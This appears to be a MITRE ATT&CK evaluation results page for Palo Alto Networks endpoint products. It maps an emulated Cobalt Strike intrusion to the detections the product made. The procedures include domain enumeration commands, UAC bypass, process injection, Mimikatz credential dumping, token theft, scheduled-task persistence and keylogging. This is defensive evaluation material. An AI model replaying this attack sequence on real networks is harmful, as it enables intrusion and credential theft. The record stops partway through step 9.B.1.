Home  >  Results  >  PaloAltoNetworks  >  Overview
XDR
Traps
WildFire
Palo Alto Networks
Tags:    

PaloAltoNetworks Overview Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.

Vendor Configuration     JSON     Legend
Legend
Main Detection Categories: Detection Modifiers:

None

Telemetry

Indicator of Compromise

General Behavior

Specific Behavior

Enrichment

Tainted

Delayed

Configuration Change
Step
Procedures
Technique
Detection Type Detection Notes
Screenshots
1.A.1
Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
User Execution
(T1204)
Telemetry
  
Telemetry showed that Resume Viewer.exe was executed and running as a process owned by user Debbie.
Telemetry showing Resume Viewer.exe running as a process
Rundll32
(T1085)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe executing update.dat with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Specific Behavior (Tainted)
  
 
Specific Behavior alerts were generated for rundll32. The alerts were tagged with the correct ATT&CK Technique (Rundll32) and were tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
General Behavior (Tainted)
  
 
A General Behavior alert was generated based on rundll32.exe executing update.dat, identified as a suspicious DLL and malware. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. Vendor stated the capability would have prevented execution of update.dat.
Telemetry showing rundll32.exe executing update.dat (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Specific Behavior alerts for rundll32 tagged with the correct ATT&CK Technique (Rundll32) (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
General Behavior alert for rundll32.exe executing update.dat, identified as a suspicious DLL and malware (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Additional details of General Behavior alert for rundll32.exe executing update.dat
Scripting
(T1064)
Telemetry
  
Telemetry showed cmd.exe launching pdfhelper.cmd.
Specific Behavior
  
A Specific Behavior alert was generated for execution of the Windows script engine. The alert was tagged with the correct ATT&CK Technique (Scripting).
Telemetry showing cmd.exe launching pdfhelper.cmd
Specific Behavior alert for execution of Windows script engine tagged with the correct ATT&CK Technique (Scripting)
1.B.1
Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
Registry Run Keys / Startup Folder
(T1060)
Telemetry (Tainted)
  
 
Telemetry showed autoupdate.bat being moved to the user Debbie's Startup folder. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment (Configuration Change, Tainted)
  
  
The capability enriched a file being created in the Startup folder with the correct ATT&CK Technique (Registry Run Keys / Start Folder). The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The logic to produce the enrichment was configured after the start of the evaluation so it is identified as a config change.
Telemetry showing autoupdate.bat being moved to the user Debbie's Startup folder (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of a file being created in the Startup folder tagged with the correct ATT&CK Technique (Registry Run Keys / Start Folder) (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
1.C.1
Cobalt Strike: C2 channel established
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed port 53 command and control traffic. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a scripting engine (rundll32.exe) making a network connection over DNS ports. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing port 53 command and control traffic (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Specific Behavior alert for a scripting engine (rundll32.exe) making a network connection over DNS ports (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Data Encoding
(T1132)
None
  
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
2.A.1
Cobalt Strike: 'ipconfig /all' via cmd
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing ipconfig with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
The capability enriched ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
Enrichment (Tainted)
  
 
The capability enriched the execution of ipconfig.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
General Behavior (Tainted)
  
 
A General Behavior alert was generated for a commonly abused process (cmd.exe) spawning out of rundll32.exe. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing ipconfig with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)
Enrichment of the execution of ipconfig.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
General Behavior alert for a commonly abused process (cmd.exe) spawning out of rundll32.exe (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.A.2
Cobalt Strike: 'arp -a' via cmd
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing arp with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
The capability enriched arp.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
Enrichment (Tainted)
  
 
The capability enriched the execution of arp.exe as possible reconnaissance as well as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing arp with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of arp.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)
Enrichment the execution of arp.exe as possible reconnaissance (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of the execution of arp.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.B.1
Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing echo with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
The capability enriched cmd.exe executing echo with the correct ATT&CK Technique (System Owner / User Discovery).
Telemetry showing cmd.exe executing echo with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of cmd.exe executing echo with the correct ATT&CK Technique (System Owner / User Discovery)
2.C.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
Enrichment (Tainted)
  
 
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Enrichment of the execution of a specific API call as process enumeration and suspicious activity (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.C.2
Cobalt Strike: 'tasklist /v' via cmd
Process Discovery
(T1057)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing tasklist with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
The capability enriched tasklist.exe executing with a related ATT&CK Technique (System Information Discovery).
Enrichment (Tainted)
  
 
The capability enriched the execution of tasklist.exe as the enumeration of running processes via the command line. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing tasklist with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of tasklist.exe executing with a related ATT&CK Technique (System Information Discovery)
Enrichment of the execution of tasklist.exe as the enumeration of running processes via the command line (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.D.1
Cobalt Strike: 'sc query' via cmd
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing sc with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing sc with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.D.2
Cobalt Strike: 'net start' via cmd
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.E.1
Cobalt Strike: 'systeminfo' via cmd
System Information Discovery
(T1082)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing systeminfo with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
The capability enriched cmd.exe executing systeminfo with the correct ATT&CK Technique (System Information Discovery).
Enrichment (Tainted)
  
 
The capability enriched the execution of systeminfo.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing systeminfo with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of cmd.exe executing systeminfo with the correct ATT&CK Technique (System Information Discovery)
Enrichment of the execution of systeminfo.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.E.2
Cobalt Strike: 'net config workstation' via cmd
System Information Discovery
(T1082)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
The capability enriched cmd.exe executing net with the correct ATT&CK Technique (System Information Discovery).
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of cmd.exe executing net with the correct ATT&CK Technique (System Information Discovery)
Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.F.1
Cobalt Strike: 'net localgroup administrators' via cmd
Permission Groups Discovery
(T1069)
Enrichment
  
The capability enriched net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery).
Enrichment of net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery)
2.F.2
Cobalt Strike: 'net localgroup administrators /domain' via cmd
Permission Groups Discovery
(T1069)
Enrichment
  
The capability enriched net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery).
Enrichment of net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery)
2.F.3
Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe as the execution of an enumeration command as well as the execution of net1.exe as the execution of an enumeration command using net or net1. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of the execution of net.exe as the possible enumeration of administrator groups (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of the execution of net1.exe as the possible enumeration of administrator groups (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of the execution of net.exe as the execution of an enumeration command using net or net1 (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.G.1
Cobalt Strike: 'net user /domain' via cmd
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.G.2
Cobalt Strike: 'net user george /domain' via cmd
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
The capability enriched net1.exe executing with the correct ATT&CK Technique (Account Discovery).
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showing cmd.exe executing net with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of net1.exe executing with the correct ATT&CK Technique (Account Discovery)
Enrichment of the execution of net.exe as the execution of an enumeration command (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
2.H.1
Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
The capability enriched reg.exe executing with the correct ATT&CK Technique (Query Registry).
Telemetry showing cmd.exe executing reg with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of reg.exe executing with the correct ATT&CK Technique (Query Registry)
3.A.1
Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Access Token Manipulation
(T1134)
Telemetry
  
Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent logon event with an elevated token and new logon ID, indicating token manipulation.
Telemetry showing svchost.exe executed with the seclogon command-line argument
Telemetry showing logon event with an elevated token and new logon ID
Bypass User Account Control
(T1088)
Telemetry
  
Telemetry showed a process integrity level change from parent rundll32.exe (medium / 8192) to child powershell.exe (high / 12288), both running as user Debbie.
Telemetry showing process integrity level change from parent rundll32.exe (medium) to child powershell.exe (high), both running as user Debbie
3.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
Enrichment (Tainted)
  
 
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Enrichment of the execution of a specific API call as process enumeration and suspicious activity (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
3.C.1
Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
Process Injection
(T1055)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for PowerShell injecting shellcode. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Specific Behavior alert for PowerShell injecting shellcode (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
4.A.1
Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
Remote System Discovery
(T1018)
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
Enrichment
  
The capability enriched the execution of net.exe as the execution of an enumeration command using net or net1.
Enrichment
  
The capability enriched the execution of net.exe as the execution of an enumeration command.
Enrichment
  
The capability enriched cmd.exe executing net with a related ATT&CK Technique (System Network Connections Discovery).
Telemetry showing cmd.exe executing net with command-line arguments
Enrichment of the execution of net.exe as the execution of an enumeration command using net or net1
Enrichment of the execution of net.exe as the execution of an enumeration command
Enrichment of cmd.exe executing net with a related ATT&CK Technique (System Network Connections Discovery)
4.A.2
Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
Remote System Discovery
(T1018)
Telemetry
  
Telemetry showed cmd.exe executing net with command-line arguments.
Enrichment
  
The capability enriched the execution of net.exe as the execution of an enumeration command using net or net1.
Telemetry showing cmd.exe executing net with command-line arguments
Enrichment of the execution of net.exe as the execution of an enumeration command using net or net1
4.B.1
Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
System Network Configuration Discovery
(T1016)
Telemetry
  
Telemetry showed cmd.exe executing netsh with command-line arguments.
Enrichment
  
The capability enriched netsh.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
Telemetry showing cmd.exe executing netsh with command-line arguments
Enrichment of netsh.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)
4.C.1
Cobalt Strike: 'netstat -ano' via cmd
System Network Connections Discovery
(T1049)
Telemetry
  
Telemetry showed cmd.exe executing netsh with command-line arguments.
Enrichment
  
The capability enriched netstat.exe executing with the correct ATT&CK Technique (System Network Connections Discovery).
Telemetry showing cmd.exe executing netstat with command-line arguments
Enrichment of netstat.exe executing with the correct ATT&CK Technique (System Network Connections Discovery)
5.A.1
Cobalt Strike: Built-in Mimikatz credential dump capability executed
Credential Dumping
(T1003)
Specific Behavior
  
A Specific Behavior alert was generated for a suspicious handle being opened to lsass.exe to dump passwords. The alert was tagged with the correct ATT&CK Technique (Credential Dumping). Vendor stated the capability would have prevented this behavior.
A Specific Behavior alert for a suspicious handle being opened to lsass.exe to dump password, tagged with the correct ATT&CK Technique (Credential Dumping)
Process Injection
(T1055)
Specific Behavior
  
A Specific Behavior alert was generated for a suspicious handle being opened to lsass.exe. The alert was tagged with a related ATT&CK Technique (Credential Dumping). Vendor stated the capability would have prevented this behavior.
A Specific Behavior alert for a suspicious handle being opened to lsass.exe, tagged with a related ATT&CK Technique (Credential Dumping)
5.A.2
Cobalt Strike: Built-in hash dump capability executed
Credential Dumping
(T1003)
Telemetry (Tainted)
  
 
Telemetry showed a code injection into lsass.exe. The telemetry was tainted by a parent process injection alert on cmd.exe.
Specific Behavior
  
A Specific Behavior alert was generated for svchost dumping credentials via the Registry. The alert was tagged with the correct ATT&CK Technique (Credential Dumping).
Telemetry showing a code injection into lsass.exe (tainted by a parent process injection alert on cmd.exe)
Specific Behavior alert for svchost dumping credentials via the Registry tagged with the correct ATT&CK Technique (Credential Dumping)
Process Injection
(T1055)
Telemetry (Tainted)
  
 
Telemetry showed a code injection into lsass.exe. The telemetry was tainted by a parent process injection alert on cmd.exe.
Telemetry showing a code injection into lsass.exe (tainted by a parent process injection alert on cmd.exe)
5.B.1
Cobalt Strike: Built-in token theft capability executed to change user context to George
Access Token Manipulation
(T1134)
Telemetry (Tainted)
  
 
Telemetry showed a cmd.exe associated with user Debbie spawn a cmd.exe associated with user George, indicating user context change via token manipulation. The telemetry was tainted by a parent process injection alert on cmd.exe.
Telemetry showing a cmd.exe associated with user Debbie spawn a cmd.exe associated with user George, indicating user context change via token manipulation (tainted by a parent process injection alert on cmd.exe)
6.A.1
Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing reg with command-line arguments. The telemetry was tainted by a parent process injection alert on cmd.exe.
Enrichment (Tainted)
  
 
The capability enriched the execution of reg.exe as querying a remote key. The data was tainted by a parent process injection alert on cmd.exe.
Enrichment
  
The capability enriched reg.exe executing with the correct ATT&CK Technique (Query Registry).
Telemetry showing cmd.exe executing reg with command-line arguments (tainted by a parent process injection alert on cmd.exe)
Enrichment of the execution of reg.exe as querying a remote key (tainted by a parent process injection alert on cmd.exe)
Enrichment of reg.exe executing with the correct ATT&CK Technique (Query Registry)
6.B.1
Cobalt Strike: C2 channel modified
Commonly Used Port
(T1043)
Telemetry
  
Telemetry showed port 80 command and control traffic. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Telemetry showing port 80 command and control traffic
Multiband Communication
(T1026)
Telemetry
  
Telemetry showed command and control traffic for both ports 80 and 53 .
Telemetry showing ports 80 and 53 command and control traffic
Standard Application Layer Protocol
(T1071)
Telemetry
  
Telemetry showed port 80 command and control traffic as well as the loading of winhttp.dll, which an analyst could use to determine HTTP was used.
Telemetry showing port 80 command and control traffic as well as the loading of winhttp.dll
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker). The telemetry was tainted by a parent process injection alert on cmd.exe.
General Behavior (Tainted)
  
 
A General Behavior alert was generated for an unexpected process using the RDP port. The data was tainted by a parent process injection alert on cmd.exe.
Telemetry showed cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker) (tainted by a parent process injection alert on cmd.exe)
General Behavior alert for an unexpected process using the RDP port (tainted by a parent process injection alert on cmd.exe)
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry
  
Telemetry showed mmc.exe creating a Registry key for user Jesse, indicating that the user is new.
Enrichment
  
The capability enriched the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Create Account).
Telemetry showing mmc.exe creating a Registry key for user Jesse
Enrichment of the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Create Account)
Graphical User Interface
(T1061)
Telemetry
  
Telemetry showed mmc.exe, the Microsoft Management Console, executing the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information.
Enrichment
  
The capability enriched the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Graphical User Interface).
Telemetry showing lusrmgr.msc running from mmc.exe
Enrichment of the Local Users and Groups snap-in (lusrmgr.msc) executing with the correct ATT&CK Technique (Graphical User Interface)
Account Discovery
(T1087)
Telemetry
  
Telemetry showed mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
Enrichment
  
The capability enriched mmc.exe, the Microsoft Management Console, executing the GUI-based lusrmgr.msc (Local Users and Groups snap-in) as reconnaissance via the MMC utility with local users and groups view.
Telemetry showing lusrmgr.msc running from mmc.exe
Enrichment of mmc.exe as reconnaissance via the MMC utility with local users and groups view
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Telemetry
  
Telemetry showed the file create event for updater.dll.
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a script engine creating/writing a DLL in the system32 folder. The alert was tainted by a parent process injection alert on cmd.exe.
Specific Behavior
  
A Specific Behavior alert was generated for a Windows scripting engine creating an executable on disk.
Telemetry showed the file create event for updater.dll
Specific Behavior alert for a script engine creating/writing a DLL in the system32 folder (tainted by a parent process injection alert on cmd.exe)
Specific Behavior alert for a Windows scripting engine creating an executable on disk
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Telemetry (Tainted)
  
 
Telemetry showed schtasks.exe creating the Resume Viewer Update Checker scheduled task as reboot persistence and as SYSTEM. The telemetry was tainted by a parent process injection alert on cmd.exe.
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for the creation of a new scheduled task. The alert was tainted by a parent process injection alert on cmd.exe. Vendor stated the capability would have prevented the creation of the scheduled task.
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a commonly abused host process scheduling a task. The alert was tainted by a parent process injection alert on cmd.exe. Vendor stated the capability would have prevented the creation of the scheduled task.
Enrichment
  
The capability enriched schtasks.exe creating the Resume Viewer Update Checker scheduled task with the correct ATT&CK Technique (Scheduled Task).
Telemetry showing schtasks.exe creating the scheduled task (tainted by a parent process injection alert on cmd.exe)
Specific Behavior alert for the creation of a new scheduled task (tainted by a parent process injection alert on cmd.exe)
Specific Behavior alert for a commonly abused host process scheduling a task (tainted by a parent process injection alert on cmd.exe)
Enrichment of schtasks.exe creating the Resume Viewer Update Checker scheduled task with the correct ATT&CK Technique (Scheduled Task)
8.A.1
Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing dir with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment (Tainted)
  
 
The capability enriched cmd.exe executing dir with command-line arguments as the execution of the dir command on a network location. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
A General Behavior alert was generated for a commonly abused process (cmd.exe) spawning out of rundll32.exe. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Telemetry showed cmd.exe executing dir with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of cmd executing dir with command-line arguments as the execution of the dir command on a network location (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of cmd.exe executing dir with command-line arguments with the correct ATT&CK Technique (File and Directory Discovery)
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing tree with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
Enrichment
  
The capability enriched cmd.exe executing tree with command-line arguments with the correct ATT&CK Technique (File and Directory Discovery).
Telemetry showed cmd.exe executing tree with command-line arguments (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
Enrichment of cmd.exe executing tree with command-line arguments with the correct ATT&CK Technique (File and Directory Discovery)
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
Enrichment (Tainted)
  
 
The capability enriched the execution of a specific API call as process enumeration and suspicious activity. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Enrichment of the execution of a specific API call as process enumeration and suspicious activity (tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine)
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
Enrichment
  
The capability enriched the execution of a specific API call as keylogging and suspicious activity. Though it does not count as a detection, the capability also showed code and hook injections into explorer.exe.
Enrichment of the execution of a specific API call as keylogging and suspicious activity
Telemetry showing code injection into explorer.exe (does not count as a detection)
Telemetry showing hook injection from explorer.exe (does not count as a detection)
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
Enrichment
  
The capability enriched the execution of a specific API call as information gathering using screen capture and suspicious activity.
Enrichment of the execution of a specific API call using screen capture and suspicious activity
Process Injection
(T1055)
Enrichment
  
The capability enriched cmd.exe injecting into explorer.exe as code injection via CreateThread.
Enrichment of cmd.exe injecting into explorer.exe as code injection via CreateThread
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
9.B.1
Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
Telemetry
  
